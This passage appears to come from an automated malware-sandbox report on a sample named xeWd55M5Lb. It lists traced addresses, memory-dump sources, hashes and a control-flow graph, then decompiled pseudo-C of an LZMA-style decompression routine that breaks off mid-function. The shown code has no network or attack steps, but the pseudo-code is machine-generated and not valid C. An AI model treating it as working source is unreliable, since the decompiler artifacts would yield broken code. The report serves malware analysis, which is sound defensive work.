                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x00000000
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x004075e5
                                                          0x004075eb
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00407524
                                                          0x00000000
                                                          0x00407399

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                          • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                          • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                          • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 766 4070ab-4070af 767 4070b5-4070b9 766->767 768 407166-407178 766->768 769 4075fa 767->769 770 4070bf-4070d3 767->770 777 4073cb-4073e0 768->777 773 4075fd-407601 769->773 771 407599-4075a3 770->771 772 4070d9-4070e2 770->772 778 4075e5-4075f8 771->778 775 4070e4 772->775 776 4070e7-407117 772->776 775->776 783 406be3-406bec 776->783 779 4073e2-4073f8 777->779 780 4073fa-407410 777->780 778->773 782 407413-40741a 779->782 780->782 785 407441-40744d 782->785 786 40741c-407420 782->786 783->769 784 406bf2 783->784 787 406bf9-406bfd 784->787 788 406d39-406d5a 784->788 789 406c9e-406ca2 784->789 790 406d0e-406d12 784->790 785->783 791 407426-40743e 786->791 792 4075cf-4075d9 786->792 787->778 794 406c03-406c10 787->794 788->777 797 406ca8-406cc1 789->797 798 40754e-407558 789->798 795 406d18-406d2c 790->795 796 40755d-407567 790->796 791->785 792->778 794->769 799 406c16-406c5c 794->799 800 406d2f-406d37 795->800 796->778 801 406cc4-406cc8 797->801 798->778 802 406c84-406c86 799->802 803 406c5e-406c62 799->803 800->788 800->790 801->789 804 406cca-406cd0 801->804 809 406c94-406c9c 802->809 810 406c88-406c92 802->810 807 406c64-406c67 GlobalFree 803->807 808 406c6d-406c7b GlobalAlloc 803->808 805 406cd2-406cd9 804->805 806 406cfa-406d0c 804->806 811 406ce4-406cf4 GlobalAlloc 805->811 812 406cdb-406cde GlobalFree 805->812 806->800 807->808 808->769 813 406c81 808->813 809->801 810->809 810->810 811->769 811->806 812->811 813->802
                                                          C-Code - Quality: 98%
                                                          			E004070AB() {
                                                          				unsigned short _t532;
                                                          				signed int _t533;
                                                          				void _t534;
                                                          				void* _t535;
                                                          				signed int _t536;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						L89:
                                                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                          						L69:
                                                          						_t606 =  *(_t613 - 0x58);
                                                          						 *(_t613 - 0x84) = 0x12;
                                                          						L132:
                                                          						 *(_t613 - 0x54) = _t606;
                                                          						L133:
                                                          						_t532 =  *_t606;
                                                          						_t589 = _t532 & 0x0000ffff;
                                                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          						if( *(_t613 - 0xc) >= _t565) {
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          							 *(_t613 - 0x40) = 1;
                                                          							_t533 = _t532 - (_t532 >> 5);
                                                          							 *_t606 = _t533;
                                                          						} else {
                                                          							 *(_t613 - 0x10) = _t565;
                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                          						}
                                                          						if( *(_t613 - 0x10) >= 0x1000000) {
                                                          							L139:
                                                          							_t534 =  *(_t613 - 0x84);
                                                          							L140:
                                                          							 *(_t613 - 0x88) = _t534;
                                                          							goto L1;
                                                          						} else {
                                                          							L137:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 5;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							goto L139;
                                                          						}
                                                          					} else {
                                                          						if( *(__ebp - 0x60) == 0) {
                                                          							L171:
                                                          							_t536 = _t535 | 0xffffffff;
                                                          							L172:
                                                          							return _t536;
                                                          						}
                                                          						__eax = 0;
                                                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          						0 | _t258 = _t258 + _t258 + 9;
                                                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          						L75:
                                                          						if( *(__ebp - 0x64) == 0) {
                                                          							 *(__ebp - 0x88) = 0x1b;
                                                          							L170:
                                                          							_t568 = 0x22;
                                                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          							_t536 = 0;
                                                          							goto L172;
                                                          						}
                                                          						__eax =  *(__ebp - 0x14);
                                                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          						if(__eax >=  *(__ebp - 0x74)) {
                                                          							__eax = __eax +  *(__ebp - 0x74);
                                                          						}
                                                          						__edx =  *(__ebp - 8);
                                                          						__cl =  *(__eax + __edx);
                                                          						__eax =  *(__ebp - 0x14);
                                                          						 *(__ebp - 0x5c) = __cl;
                                                          						 *(__eax + __edx) = __cl;
                                                          						__eax = __eax + 1;
                                                          						__edx = 0;
                                                          						_t274 = __eax %  *(__ebp - 0x74);
                                                          						__eax = __eax /  *(__ebp - 0x74);
                                                          						__edx = _t274;
                                                          						__eax =  *(__ebp - 0x68);
                                                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          						_t283 = __ebp - 0x64;
                                                          						 *_t283 =  *(__ebp - 0x64) - 1;
                                                          						 *( *(__ebp - 0x68)) = __cl;
                                                          						L79:
                                                          						 *(__ebp - 0x14) = __edx;
                                                          						L80:
                                                          						 *(__ebp - 0x88) = 2;
                                                          					}
                                                          					L1:
                                                          					_t535 =  *(_t613 - 0x88);
                                                          					if(_t535 > 0x1c) {
                                                          						goto L171;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                          						case 0:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							_t535 =  *( *(_t613 - 0x70));
                                                          							if(_t535 > 0xe1) {
                                                          								goto L171;
                                                          							}
                                                          							_t539 = _t535 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t570);
                                                          							_push(9);
                                                          							_pop(_t571);
                                                          							_t609 = _t539 / _t570;
                                                          							_t541 = _t539 % _t570 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t604 = _t541 % _t571 & 0x000000ff;
                                                          							 *(_t613 - 0x3c) = _t604;
                                                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          								L10:
                                                          								if(_t612 == 0) {
                                                          									L12:
                                                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          									goto L15;
                                                          								} else {
                                                          									goto L11;
                                                          								}
                                                          								do {
                                                          									L11:
                                                          									_t612 = _t612 - 1;
                                                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          								} while (_t612 != 0);
                                                          								goto L12;
                                                          							}
                                                          							if( *(_t613 - 4) != 0) {
                                                          								GlobalFree( *(_t613 - 4));
                                                          							}
                                                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                          							 *(_t613 - 4) = _t535;
                                                          							if(_t535 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          								goto L10;
                                                          							}
                                                          						case 1:
                                                          							L13:
                                                          							__eflags =  *(_t613 - 0x6c);
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 1;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							_t45 = _t613 - 0x48;
                                                          							 *_t45 =  *(_t613 - 0x48) + 1;
                                                          							__eflags =  *_t45;
                                                          							L15:
                                                          							if( *(_t613 - 0x48) < 4) {
                                                          								goto L13;
                                                          							}
                                                          							_t547 =  *(_t613 - 0x40);
                                                          							if(_t547 ==  *(_t613 - 0x74)) {
                                                          								L20:
                                                          								 *(_t613 - 0x48) = 5;
                                                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          								goto L23;
                                                          							}
                                                          							 *(_t613 - 0x74) = _t547;
                                                          							if( *(_t613 - 8) != 0) {
                                                          								GlobalFree( *(_t613 - 8));
                                                          							}
                                                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          							 *(_t613 - 8) = _t535;
                                                          							if(_t535 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						case 2:
                                                          							L24:
                                                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          							 *(_t613 - 0x84) = 6;
                                                          							 *(_t613 - 0x4c) = _t554;
                                                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                          							goto L132;
                                                          						case 3:
                                                          							L21:
                                                          							__eflags =  *(_t613 - 0x6c);
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 3;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							_t67 = _t613 - 0x70;
                                                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          							__eflags =  *_t67;
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							L23:
                                                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          							if( *(_t613 - 0x48) != 0) {
                                                          								goto L21;
                                                          							}
                                                          							goto L24;
                                                          						case 4:
                                                          							goto L133;
                                                          						case 5:
                                                          							goto L137;
                                                          						case 6:
                                                          							__edx = 0;
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x34) = 1;
                                                          								 *(__ebp - 0x84) = 7;
                                                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          							__esi =  *(__ebp - 0x60);
                                                          							__cl = 8;
                                                          							__cl = 8 -  *(__ebp - 0x3c);
                                                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          							__ecx =  *(__ebp - 0x3c);
                                                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          							__ecx =  *(__ebp - 4);
                                                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          							__eflags =  *(__ebp - 0x38) - 4;
                                                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          							if( *(__ebp - 0x38) >= 4) {
                                                          								__eflags =  *(__ebp - 0x38) - 0xa;
                                                          								if( *(__ebp - 0x38) >= 0xa) {
                                                          									_t98 = __ebp - 0x38;
                                                          									 *_t98 =  *(__ebp - 0x38) - 6;
                                                          									__eflags =  *_t98;
                                                          								} else {
                                                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          								}
                                                          							} else {
                                                          								 *(__ebp - 0x38) = 0;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x34) - __edx;
                                                          							if( *(__ebp - 0x34) == __edx) {
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								goto L61;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__ecx =  *(__ebp - 8);
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								__al =  *((intOrPtr*)(__eax + __ecx));
                                                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          								goto L41;
                                                          							}
                                                          						case 7:
                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                          							if( *(__ebp - 0x40) != 1) {
                                                          								__eax =  *(__ebp - 0x24);
                                                          								 *(__ebp - 0x80) = 0x16;
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x28);
                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          								__eax = 0;
                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                          								__eflags = __eax;
                                                          								 *(__ebp - 0x58) = __eax;
                                                          								goto L69;
                                                          							}
                                                          							__eax =  *(__ebp - 4);
                                                          							__ecx =  *(__ebp - 0x38);
                                                          							 *(__ebp - 0x84) = 8;
                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          							goto L132;
                                                          						case 8:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xa;
                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x38);
                                                          								__ecx =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                          								 *(__ebp - 0x84) = 9;
                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          							}
                                                          							goto L132;
                                                          						case 9:
                                                          							goto L0;
                                                          						case 0xa:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xb;
                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x28);
                                                          							goto L88;
                                                          						case 0xb:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__ecx =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x20);
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x24);
                                                          							}
                                                          							__ecx =  *(__ebp - 0x28);
                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          							L88:
                                                          							__ecx =  *(__ebp - 0x2c);
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          							goto L89;
                                                          						case 0xc:
                                                          							L99:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xc;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t334 = __ebp - 0x70;
                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t334;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							__eax =  *(__ebp - 0x2c);
                                                          							goto L101;
                                                          						case 0xd:
                                                          							L37:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xd;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t122 = __ebp - 0x70;
                                                          							 *_t122 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t122;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L39:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          								goto L48;
                                                          							}
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								goto L54;
                                                          							}
                                                          							L41:
                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          							 *(__ebp - 0x48) = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								 *(__ebp - 0x40) = 1;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
